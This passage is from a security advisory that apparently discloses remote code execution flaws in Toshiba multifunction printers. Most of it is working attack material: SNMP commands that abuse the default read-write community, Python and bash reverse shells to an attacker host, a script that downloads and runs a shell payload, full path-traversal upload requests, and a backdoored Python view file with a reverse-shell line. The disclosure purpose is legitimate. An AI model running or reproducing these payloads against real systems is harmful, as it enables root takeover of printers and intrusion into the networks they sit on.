\/>NET-SNMP-EXTEND-MIB::nsExtendExecType.&quot;cmd&quot; = INTEGER: exec(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendRunType.&quot;cmd&quot; = INTEGER: run-on-read(1)<br 
\/>NET-SNMP-EXTEND-MIB::nsExtendStorage.&quot;cmd&quot; = INTEGER: volatile(2)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: active(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.&quot;cmd&quot; = STRING:<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutputFull.&quot;cmd&quot; = STRING:<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutNumLines.&quot;cmd&quot; = INTEGER: 1<br \/>NET-SNMP-EXTEND-MIB::nsExtendResult.&quot;cmd&quot; = INTEGER: 0<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&quot;cmd&quot;.1 = STRING: uid=0(root)<br \/>gid=2000(trusted) groups=0(root)<\/p>\n<p>Using this vulnerability, any attacker can get root access on a<br \/>remote Toshiba printer, as shown below.<\/p>\n<p>The following PoC executes a connect-back shell with root<br \/>privileges to 10.0.0.2:21\/tcp:<\/p>\n<p>kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus.&quot;cmd&quot;' = createAndGo 'nsExtendCommand.&quot;cmd&quot;' =<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python 'nsExtendArgs.&quot;cmd&quot;' = '-c<br \/>&quot;import sys,socket,os,pty;s=socket.socket();s.connect((\\&quot;10.0.0.2\\&quot;,21));[os.dup2(s.fileno(),fd)<br \/>for fd in (0,1,2)];pty.spawn(\\&quot;\/bin\/sh\\&quot;)&quot;'<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING:<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: -c &quot;import<br \/>sys,socket,os,pty;s=socket.socket();s.connect((\\&quot;10.0.0.2\\&quot;,21));[os.dup2(s.fileno(),fd)<br \/>for fd in (0,1,2)];pty.spawn(\\&quot;\/bin\/sh\\&quot;)&quot;<br \/>kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects<\/p>\n<p>And on the 
attacker machine, we will receive a shell on port 21\/tcp:<\/p>\n<p>kali# nc -l -v -p 21<br \/>listening on [any] 21 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467<br \/>sh-4.1# uname -ap<br \/>Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed<br \/>Jul 6 16:20:23 IST 2022 i686 GNU\/Linux<br \/>sh-4.1# id<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>sh-4.1# exit<\/p>\n<p>The attacker will then get a full root access in the printer,<br \/>including full access to the encrypted partition:<\/p>\n<p>kali# nc -l -v -p 443<br \/>listening on [any] 443 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468<br \/>bash-4.1# df -h<br \/>df -h<br \/>Filesystem Size Used Avail Use% Mounted on<br \/>rootfs 4.8G 3.7G 904M 81% \/<br \/>\/dev\/root 48M 28M 18M 62% \/old_root<br \/>\/dev\/sda2 4.8G 3.7G 904M 81% \/<br \/>\/dev\/sda13 4.8G 49M 4.5G 2% \/platform<br \/>none 1.5G 188K 1.5G 1% \/dev<br \/>\/dev\/sda3 4.8G 1.3G 3.4G 28% \/rollback<br \/>\/dev\/sda5 25G 904M 23G 4% \/work<br \/>\/dev\/sda6 2.9G 620M 2.2G 23% \/registration<br \/>\/dev\/sda7 976M 1.3M 908M 1% \/backup<br \/>\/dev\/sda8 32G 60M 30G 1% \/imagedata<br \/>\/dev\/sda9 94G 65M 89G 1% \/application<br \/>\/dev\/mapper\/enc_encryption<br \/>992M 2.6M 964M 1% \/encryption<br \/>\/dev\/sda12 119G 60M 112G 1% \/storage<br \/>tmpfs 1.5G 3.7M 1.5G 1% \/dev\/shm<br \/>bash-4.1# mount<br \/>mount<br \/>rootfs on \/ type rootfs (rw)<br \/>\/dev\/root on \/old_root type ext2 (rw,relatime,errors=continue,user_xattr)<br \/>proc on \/old_root\/proc type proc (rw,relatime)<br \/>\/dev\/sda2 on \/ type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda13 on \/platform type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>proc on \/proc type proc (rw,relatime)<br \/>sysfs on \/sys type sysfs 
(rw,nosuid,nodev,noexec,relatime)<br \/>none on \/dev type tmpfs (rw,relatime,mode=755)<br \/>ramfs on \/ramdisk type ramfs (rw,relatime,size=100m)<br \/>\/dev\/sda3 on \/rollback type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda5 on \/work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda6 on \/registration type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda7 on \/backup type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda8 on \/imagedata type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda9 on \/application type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/mapper\/enc_encryption on \/encryption type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda12 on \/storage type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>tmpfs on \/dev\/shm type tmpfs (rw,relatime,mode=755)<br \/>devpts on \/dev\/pts type devpts (rw,relatime,mode=600)<br \/>fusectl on \/sys\/fs\/fuse\/connections type fusectl (rw,relatime)<br \/>bash-4.1#<\/p>\n<p>The vulnerability lies in the SNMP configuration rather than in a bug<br \/>in net-snmpd: snmpd runs as root, is reachable with the default<br \/>read\/write community `private`, and supports the<br \/>`NET-SNMP-EXTEND-MIB` extension MIB.<\/p>\n<p>This extension allows the execution of arbitrary commands by the<br \/>net-snmpd daemon, with root privileges, in 2 steps:<\/p>\n<p>1. Creation of a new row in nsExtendConfigTable with an SNMP SET<br \/>(command, arguments and `nsExtendStatus = createAndGo`);<br \/>2. Read of the nsExtendOutput objects of that row (`run-on-read`),<br \/>which executes the command and returns its output.<\/p>\n<p>A bash payload is also provided: the following PoC downloads a shell<br \/>script, saves it as `\/dev\/shm\/pwn.sh` and executes it as root on the<br \/>targeted printer:<\/p>\n<p>kali% cat \/var\/www\/html\/pwn.sh<br \/>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/443 0&gt;&amp;1<\/p>\n<p>kali% cat .\/remote-pwn.sh<br \/>#!\/bin\/sh<\/p>\n<p>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>'nsExtendStatus.&quot;cmd&quot;' = createAndGo 'nsExtendCommand.&quot;cmd&quot;' = \/bin\/sh<br \/>'nsExtendArgs.&quot;cmd&quot;' = '-c &quot;curl http:\/\/10.0.0.2\/pwn.sh -o<br \/>\/dev\/shm\/pwn.sh&quot;'<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>'nsExtendStatus.&quot;cmd&quot;' = createAndGo 'nsExtendCommand.&quot;cmd&quot;' = \/bin\/sh<br \/>'nsExtendArgs.&quot;cmd&quot;' = '-c &quot;chmod 755 \/dev\/shm\/pwn.sh&quot;'<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>'nsExtendStatus.&quot;cmd&quot;' = createAndGo 'nsExtendCommand.&quot;cmd&quot;' = \/bin\/sh<br \/>'nsExtendArgs.&quot;cmd&quot;' = ' &quot;\/dev\/shm\/pwn.sh&quot;'<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<\/p>\n<p>Using this PoC to get a connect-back root shell:<\/p>\n<p>kali% .\/remote-pwn.sh 10.0.0.1<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: -c &quot;curl<br \/>http:\/\/10.0.0.2\/pwn.sh -o \/dev\/shm\/pwn.sh&quot;<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = 
INTEGER: 21<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: -c &quot;curl<br \/>http:\/\/10.0.0.2\/pwn.sh -o \/dev\/shm\/pwn.sh&quot;<br \/>NET-SNMP-EXTEND-MIB::nsExtendInput.&quot;cmd&quot; = STRING:<br \/>NET-SNMP-EXTEND-MIB::nsExtendCacheTime.&quot;cmd&quot; = INTEGER: 5<br \/>NET-SNMP-EXTEND-MIB::nsExtendExecType.&quot;cmd&quot; = INTEGER: exec(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendRunType.&quot;cmd&quot; = INTEGER: run-on-read(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStorage.&quot;cmd&quot; = INTEGER: volatile(2)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: active(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.&quot;cmd&quot; = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutputFull.&quot;cmd&quot; = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>Dload Upload Total Spent<br \/>Left Speed<br \/>100 53 100 53 0 0 53 0 0:00:01 --:--:--<br \/>0:00:01 114<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutNumLines.&quot;cmd&quot; = INTEGER: 3<br \/>NET-SNMP-EXTEND-MIB::nsExtendResult.&quot;cmd&quot; = INTEGER: 0<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&quot;cmd&quot;.1 = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&quot;cmd&quot;.2 = STRING:<br \/>Dload Upload Total Spent Left Speed<br \/>100 53 100 53 0 0 53 0 0:00:01 --:--:--<br \/>0:00:01 114<br \/>Error in packet.<br \/>Reason: inconsistentValue (The set value is illegal or unsupported<br \/>in some way)<br \/>Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot;<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&quot;cmd&quot; = INTEGER: createAndGo(4)<br 
\/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&quot;cmd&quot; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&quot;cmd&quot; = STRING: &quot;\/dev\/shm\/pwn.sh&quot;<br \/>caTimeout: No Response from 10.0.0.1<\/p>\n<p>And the connect-back shell script will connect to 10.0.0.2 on port<br \/>443\/tcp, as defined in the previous `pwn.sh` script:<\/p>\n<p>kali# nc -l -v -p 443<br \/>listening on [any] 443 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464<br \/>bash-4.1# uname -ap<br \/>Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue<br \/>Jul 5 09:58:22 IST 2022 i686 GNU\/Linux<br \/>bash-4.1# id<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>bash-4.1#<\/p>\n<p>We can also review the configuration file located at<br \/>`\/encryption\/al\/network\/config\/snmpd.conf`, containing the default<br \/>communities:<\/p>\n<p>bash-4.1# grep -v '^#' \/encryption\/al\/network\/config\/snmpd.conf<br \/>rocommunity public<\/p>\n<p>rocommunity6 public<\/p>\n<p>rwcommunity private<\/p>\n<p>rwcommunity6 private<\/p>\n<p>com2sec udp 0.0.0.0\/24 public<\/p>\n<p>view all included .1 80<br \/>view generaluser_view excluded .1<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4<\/p>\n<p>access udpGroup &quot;toshibaAmerica&quot; v1 noauth<br \/>exact all all none<br \/>access admin_priv_group &quot;&quot; usm priv<br \/>prefix all all none<br \/>access admin_auth_group &quot;&quot; usm auth<br \/>prefix all all none<br \/>access generaluser_priv_group &quot;&quot; usm priv<br \/>prefix all generaluser_view none<br \/>access generaluser_auth_group &quot;&quot; usm auth<br \/>prefix all generaluser_view none<\/p>\n<p>trapcommunity public<\/p>\n<p>dlmod mibs_impl<br 
\/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so<\/p>\n<p>master off<\/p>\n<p>agentaddress udp:161,udp6:161<\/p>\n<p>authtrapenable 1<\/p>\n<p>maxGetbulkRepeats 20<\/p>\n<p>maxGetbulkResponses 100bash-4.1#<\/p>\n<p>SNMP is also exposed over IPv6.<\/p>\n<p>## Details &#8211; Pre-authenticated Remote Code Execution as root or apache<br \/>and multiple Local Privilege Escalations<\/p>\n<p>Toshiba printers provide several ways to upload files using the web interface.<\/p>\n<p>By default, this web interface is reachable without authentication.<\/p>\n<p>For example, using the e-filing web interface, freely reachable using<br \/>http:\/\/ip:8080\/?MAIN=EFILING, we can upload documents:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is possible to upload a document:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>The uploaded file will be stored inside the printer in the<br \/>\/work\/al\/tmp\/upload\/ directory, inside a directory named by the<br \/>current session.<\/p>\n<p>bash-4.1# find \/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test3.txt<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test1.txt<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test2.txt<br \/>bash-4.1# ls -latrR \/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload:<br \/>total 12<br \/>drwxr-xr-x 7 root lp 4096 Mar 24 
05:35 ..<br \/>drwx------ 2 apache trusted 4096 Mar 24 05:43<br \/>ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab<br \/>drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .<\/p>\n<p>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab:<br \/>total 20<br \/>-rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt<br \/>-rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt<br \/>-rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt<br \/>drwx------ 2 apache trusted 4096 Mar 24 05:43 .<br \/>drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 ..<br \/>bash-4.1#<\/p>\n<p>This session is issued by the printer when the web interface is<br \/>visited without authentication.<\/p>\n<p>An attacker can replay the HTTP request with a valid session obtained<br \/>while browsing http:\/\/ip\/?MAIN=EFILING without authentication, and<br \/>change the path of the uploaded file. This path will then be used to<br \/>store the file inside the remote printer.<\/p>\n<p>For example, with a `Name` variable set to<br \/>`\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program`, the<br \/>uploaded file is correctly written into<br \/>`\/home\/SYSROM_SRC\/sbin\/malicious.program` inside the printer.<\/p>\n<p>The HTTP request will be:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;12552735029913057752829397207<br \/>Content-Length: 1011<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/efiling\/UploadArchive.html?v=1517352288ta<br \/>Cookie: Locale=en-US,en#q=0.5; 
BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE;<br \/>Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61;<br \/>IgnoreSessionTimeout=3<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[1].formSubmitComplete<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;test.txt&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;DataImport&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.c8a776a2c87613d78cbb94c558269c61<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program&#8221;;<br \/>filename=&#8221;test.txt&#8221;<br \/>Content-Type: text\/plain<\/p>\n<p>MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207&#8211;<\/p>\n<p>Burp Request:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>And the file is correctly written into<br 
\/>`\/home\/SYSROM_SRC\/sbin\/malicious.program` inside the printer:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>This vulnerability can be used to get Remote Code Execution in<br \/>several different ways. Due to other weaknesses found in Toshiba<br \/>printers, there are hundreds of different ways to get Remote Code<br \/>Execution. For example:<\/p>\n<p>* Upload of a malicious library defined in the LD_PRELOAD variable:<br \/>* \/ramdisk\/al\/libGetNameInfoInterface.so or<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so can be overwritten by a<br \/>malicious library<br \/>* Upload of a malicious library using the LD_LIBRARY_PATH variable &#8211;<br \/>An attacker can upload malicious libraries inside:<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib,<br \/>* \/mfp\/lib,<br \/>* \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib,<br \/>* \/home\/SYSROM_SRC\/build\/thirdparty\/plugins\/platforminputcontexts\/,<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib.<br \/>* Upload of a malicious program due to insecure permissions:<br \/>* As shown in Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs, a lot of programs running<br \/>as root can be overwritten due to insecure permissions (777)<br \/>* Upload a malicious Python program or a malicious Python library<br \/>* &#8230;<\/p>\n<p>This missing check can be found in several HTML forms of the<br \/>printer's web interface, reachable without administrative privileges. 
For example, the page<br \/>at http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>allows uploading any file:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is mandatory to inject a `&lt;INPUT TYPE=SUBMIT&gt;` in the server<br \/>response using Burp or to directly generate such request to upload any<br \/>file.<\/p>\n<p>An example is shown below on how to get Remote Code Execution using<br \/>the upload of a malicious Python script in the next section, using the<br \/>following request:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;394285998421640844852768059947<br \/>Content-Length: 1126<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK;<br \/>IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br 
\/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;GetValue&gt;&lt;eFiling&gt;&lt;View&gt;&lt;BoxList\/&gt;&lt;\/View&gt;&lt;\/eFiling&gt;&lt;\/GetValue&gt;&lt;Command&gt;&lt;GetEFilingBoxes&gt;&lt;commandNode&gt;eFiling\/BoxList&lt;\/commandNode&gt;&lt;Params&gt;&lt;responseXpath<br \/>contentType=&#8217;XPath&#8217;&gt;eFiling\/View\/BoxList&lt;\/responseXpath&gt;&lt;curPage<br \/>contentType=&#8217;Value&#8217;&gt;1&lt;\/curPage&gt;&lt;pageSize<br \/>contentType=&#8217;Value&#8217;&gt;200&lt;\/pageSize&gt;&lt;definedBox<br \/>contentType=&#8217;Value&#8217;&gt;true&lt;\/definedBox&gt;&lt;\/Params&gt;&lt;\/GetEFilingBoxes&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;test.txt&#8221;; filename=&#8221;test.txt&#8221;<br \/>Content-Type: text\/plain<\/p>\n<p>test<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947&#8211;<\/p>\n<p>And the file is correctly uploaded into the printer:<\/p>\n<p>bash-4.1# ls -la<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c\/<br \/>total 12<br \/>drwx&#8212;&#8212; 2 apache trusted 4096 May 27 19:34 .<br \/>drwxrwxrwx 3 root trusted 4096 May 27 19:30 ..<br \/>-rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt<br \/>bash-4.1# cat<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c\/test.txt<br \/>test<br \/>bash-4.1#<\/p>\n<p>We can find several 
webpages that allow exploiting the vulnerable<br \/>`\/contentwebserver\/upload` API.<\/p>\n<p>It was determined that these webpages use the insecure<br \/>`\/contentwebserver\/upload` API. They can be used by any attacker to<br \/>upload any file into the printers:<\/p>\n<p>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchive.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchiveProgress.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UpLoadArchiveClose.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchiveButton.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Registration\/AddressBook\/AddrImport.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Registration\/AddressBook\/AddrImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>&#8211; &#8211; &#8230;<\/p>\n<p>Some of these pages are directly reachable without authentication<br \/>(e.g. Registration or efiling) and can be found without an admin<br \/>account.<\/p>\n<p>### Remote Code Execution &#8211; Upload of a new .py module inside WSGI<br \/>Python programs<\/p>\n<p>Some of the APIs and web interfaces of the printers are written in Python.<\/p>\n<p>Since the permissions of these Python scripts inside the printers are<br \/>insecure, a backdoored version of<br \/>`\/registration\/al\/TopAccessPy\/server\/screenfacade\/appmgmt\/views.py`<br \/>was uploaded as shown below:<\/p>\n<p>Content of `\/registration\/al\/TopAccessPy\/server\/screenfacade\/appmgmt\/views.py`<br \/>with a malicious payload added on line 25:<\/p>\n[code:python]1 #! 
\/usr\/bin\/env python<br \/>2 # -*- coding: utf-8 -*-<br \/>3 import sys<br \/>4 import os<br \/>5 from pyramid.view import view_config<br \/>6 from pyramid.exceptions import HTTPForbidden<br \/>7 from pyramid.response import Response,FileResponse<br \/>8 from server.screenfacade.appmgmt.applicationmanager import<br \/>applicationManagementModel<br \/>9 import logging<br \/>10 import json<br \/>11 import pyeapicore<br \/>12<br \/>13 sys.path.append(&#8216;\/home\/SYSROM_SRC\/lib&#8217;)<br \/>14<br \/>15 log = logging.getLogger(&#8220;server&#8221;)<br \/>16<br \/>17 @view_config(route_name=&#8217;get_app_list_deployed&#8217;, xhr=True, renderer=&#8217;jsonp&#8217;)<br \/>18 def get_app_list_deployed(request):<br \/>19 log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>20 log.warning(&#8220;get app list Views : Start &#8220;)<br \/>21 SessionID = &#8221;<br \/>22 session = &#8216; &#8216;<br \/>23 csrfpId = &#8221;<br \/>24 browserLang = &#8221;<br \/>25 os.system(&#8220;bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1&#8221;)<br \/>26<br \/>27 if &#8216;SessionID&#8217; in request.cookies:<br \/>28 SessionID = request.cookies[&#8216;SessionID&#8217;]<br \/>29 if 